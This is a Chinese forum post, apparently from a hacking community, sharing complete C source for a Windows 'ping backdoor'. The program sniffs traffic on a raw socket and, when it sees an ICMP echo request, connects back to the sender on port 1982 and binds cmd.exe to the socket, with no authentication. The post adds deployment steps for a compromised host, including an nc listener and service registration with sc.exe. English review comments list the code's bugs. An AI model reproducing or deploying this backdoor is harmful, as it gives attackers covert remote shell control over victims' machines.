学C修改的ping后门,改为反向连接,免解包
学了一个多星期C,便想尝试修改一下人家的东西。一直感觉自己在混日子,整天
在打游戏,哎。感谢love1983,是他启发我学C。
其实这个修改的ping后门,存在很多问题的,毕竟我刚学C。
主要修改:1,去掉包大小的检测,去掉解包函数,只要 sniffer 到 ICMP 回显请求包(类型 8)就直接反向连接;注意代码只比较 IP 首部后的第一个字节是否为 8,并没有检查 IP 首部的协议字段和包长度。2,把原来的 bind shell(创建两个管道进行通信)改为反向连接(bind2shell)
3,没有任何密码/身份验证(任何向肉机发 ping 的主机都会得到反向 shell),不过可以自行修改。
使用方法:1,在肉机运行lping.exe。2,本机用nc -l -p 1982。3,ping肉机就可以
直接得到shell了。(lping.exe没有注册成服务,可以用sc.exe来注册)
代码:
/* ======================================================================
Ping BackDoor V0.1 For Win2K
Code by Lion. Welcome to http://www.cnhonker.net
Echo by lintao520
Save as *.cpp
========================================================================= */
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <mstcpip.h>
#pragma comment(lib,"ws2_32")
#define ICMP_ECHO 8 // ICMP type value of an echo request; the only type tested below
#define ICMP_ECHOREPLY 0 // ICMP type value of an echo reply (not used in this file)
#define BIND_PORT 1982 // TCP port on the pinging host that bind2shell() connects back to
#define MAX_PACKET 10000 // size in bytes of the raw-socket receive buffer
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,(s)) // zero-filled heap allocation; the single caller neither checks for NULL nor frees it
// 定义IP 首部
// IPv4 header as laid out on the wire (fixed 20-byte part only; options are not represented).
// Only sizeof(IPHeader) is used by sniffer() below — none of the fields are ever read.
typedef struct iphdr
{
unsigned char h_verlen; // 4-bit header length + 4-bit IP version (1 byte)
unsigned char tos; // 8-bit type of service (1 byte)
unsigned short total_len; // 16-bit total length in bytes (2 bytes)
unsigned short ident; // 16-bit identification (2 bytes)
unsigned short frag_and_flags; // 3-bit flags + fragment offset (2 bytes)
unsigned char ttl; // 8-bit time to live (1 byte)
unsigned char proto; // 8-bit protocol (TCP, UDP, ICMP, ...) (1 byte); NOTE(review): never consulted by sniffer()
unsigned short checksum; // 16-bit header checksum (2 bytes)
unsigned int sourceIP; // 32-bit source address (4 bytes)
unsigned int destIP; // 32-bit destination address (4 bytes)
} IPHeader; // 20 bytes with default alignment; an IHL > 5 (options present) shifts the real ICMP header past this offset
// 定义ICMP首部
// ICMP header as laid out on the wire. Only i_type is read by sniffer() below.
// (The tag `_ihdr` starts with an underscore, which C reserves for the implementation at file scope.)
typedef struct _ihdr
{
unsigned char i_type; // 8-bit type (1 byte); compared against ICMP_ECHO
unsigned char i_code; // 8-bit code (1 byte)
unsigned short i_cksum; // 16-bit checksum (2 bytes)
unsigned short i_id; // identifier, conventionally the sender's process id (2 bytes)
unsigned short i_seq; // sequence number (2 bytes)
} ICMPHeader; // 8 bytes
int sniffer(); // raw-socket capture loop; returns -1 on error and otherwise never returns
void bind2shell(struct sockaddr_in *); // reverse-connects to the given address and attaches a cmd.exe to the socket
// Arguments for the WSAIoctl(SIO_RCVALL) call in sniffer(): output buffer, input value
// (1 switches receive-all mode on, per mstcpip.h), and the bytes-returned counter.
DWORD dwBufferLen[10];
DWORD dwBufferInLen = 1;
DWORD dwBytesReturned = 0;
// ICMPDoor 主函数
// Entry point: initialises Winsock 2.2, runs the capture loop, and cleans up.
// sniffer() only returns on error, so WSACleanup() is reached only after a failure.
// argc/argv are unused — no command-line configuration is supported.
int main(int argc, char *argv[])
{
WSADATA wsaData;
int retval;
// Winsock start-up
if ((retval = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
{
printf("WSAStartup failed: %d/n",retval); // "/n" is a literal slash-n, not a newline (probably a lost backslash in transcription)
exit(-1);
}
// Run the capture loop; its return value is ignored
sniffer();
// Winsock shutdown
WSACleanup();
return 0;
}
// sniffer 主函数
// Capture loop. Opens a raw IP socket, binds it to the first address resolved for
// the local hostname, switches the interface into receive-all mode (SIO_RCVALL),
// and then, for every captured packet whose byte at offset sizeof(IPHeader) equals
// ICMP_ECHO, calls bind2shell() with the packet's source address.
// Returns -1 on a socket or name-resolution error; the loop never exits normally.
//
// NOTE(review): the trigger test is deliberately minimal (the post says the size and
// unpack checks were removed); two consequences follow from the code as written:
//   - IPHeader.proto is never tested, so any captured IP packet — not only ICMP —
//     whose byte at offset 20 is 8 fires the reverse connection.
//   - The ICMP header is read at a fixed 20-byte offset and `sread` is never used,
//     so IP options are not accounted for, and a packet shorter than 28 bytes is
//     judged on whatever the buffer still holds from an earlier packet (zero on
//     first use because of HEAP_ZERO_MEMORY).
int sniffer()
{
SOCKET socksniffer;
struct sockaddr_in dest,from;
struct hostent * hp;
int sread;
int fromlen = sizeof(from);
unsigned char LocalName[256];
char *recvbuf;
ICMPHeader *icmphdr;
// Raw IP socket used as the packet sniffer
if ((socksniffer = WSASocket(AF_INET, SOCK_RAW, IPPROTO_IP, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
{
printf("WSASocket() failed: %d/n", WSAGetLastError()); // "/n" is a literal slash-n, not a newline
return -1;
}
// Resolve the local hostname to pick the interface; gethostname()'s return value is not checked
gethostname((char*)LocalName, sizeof(LocalName)-1);
if((hp = gethostbyname((char*)LocalName)) == NULL)
{
return -1;
}
memset(&dest,0,sizeof(dest));
memcpy(&dest.sin_addr.s_addr, hp->h_addr_list[0], hp->h_length); // only the first resolved address is used
dest.sin_family = AF_INET;
dest.sin_port = htons(8000); // the port carries no meaning for a raw socket; bind() only selects the interface
// bind() result is ignored; if it fails, recvfrom() below reports the error instead
bind(socksniffer, (PSOCKADDR)&dest, sizeof(dest));
// Enable receive-all mode so every IP packet on the interface is delivered here; result ignored
WSAIoctl(socksniffer, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen), &dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL );
// Zero-filled MAX_PACKET-byte receive buffer; NULL is not checked and it is never freed
recvbuf = (char *)xmalloc(MAX_PACKET);
// Capture loop
while(1)
{
// Blocking read of one packet; `from` receives the packet's IP source address
sread = recvfrom(socksniffer, recvbuf, MAX_PACKET, 0, (struct sockaddr*)&from, &fromlen);
// Read error
if (sread == SOCKET_ERROR || sread < 0)
{
// No receive timeout is configured in this function, so this branch is not expected to fire
if (WSAGetLastError() == WSAETIMEDOUT)
{
continue;
}
printf("recvfrom failed: %d/n",WSAGetLastError()); // "/n" again: no newline is printed
return -1;
}
else
// Trigger test on the type byte at the fixed ICMP offset
{
icmphdr = (ICMPHeader *)(recvbuf + sizeof(IPHeader)); // assumes a 20-byte IP header (IHL == 5)
if (icmphdr->i_type == ICMP_ECHO) // echo request? (protocol field and packet length are not checked)
bind2shell(&from); // reverse-connect to the packet's claimed source address — no authentication of any kind
else
printf("/r/n Get Other Packets!");
}
}
return 1; // unreachable: the loop above only exits via `return -1`
}
// bind2shell函数
// Reverse shell. Connects a TCP socket to BIND_PORT on from->sin_addr and starts
// cmd.exe with its stdin/stdout/stderr all set to that socket. Called once per
// triggering packet from sniffer(); nothing created here is ever closed.
//
// NOTE(review): connect() and CreateProcess() are both unchecked, so when no
// listener is waiting on BIND_PORT the CreateProcess() is still attempted with an
// unconnected socket as the child's std handles. Each call also leaks hSocket,
// pi.hProcess and pi.hThread, and adds one unmatched WSAStartup() reference on top
// of the one main() already holds.
void bind2shell(struct sockaddr_in * from)
{
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in sa;
memset(&sa,0,sizeof(sa));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData); // redundant: Winsock is already initialised by main(); never paired with WSACleanup()
// dwFlags is 0 (non-overlapped), which presumably is what allows the handle to be used as a std handle below
hSocket=WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
sa.sin_family=AF_INET;
sa.sin_port=htons(BIND_PORT);
sa.sin_addr.s_addr=from->sin_addr.s_addr; // destination is the triggering packet's source address, taken as-is
connect(hSocket,(struct sockaddr*)&sa,sizeof(sa)); // return value ignored
si.cb=sizeof(si);
si.dwFlags=STARTF_USESTDHANDLES;
si.hStdInput=si.hStdOutput=si.hStdError=(void *)hSocket; // the socket doubles as all three std handles
// bInheritHandles = 1 so the child inherits the socket; return value ignored.
// NOTE(review): lpCommandLine is a string literal; the Unicode CreateProcessW may
// write into that buffer, so this relies on the ANSI build.
CreateProcess(NULL,"cmd.exe",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
}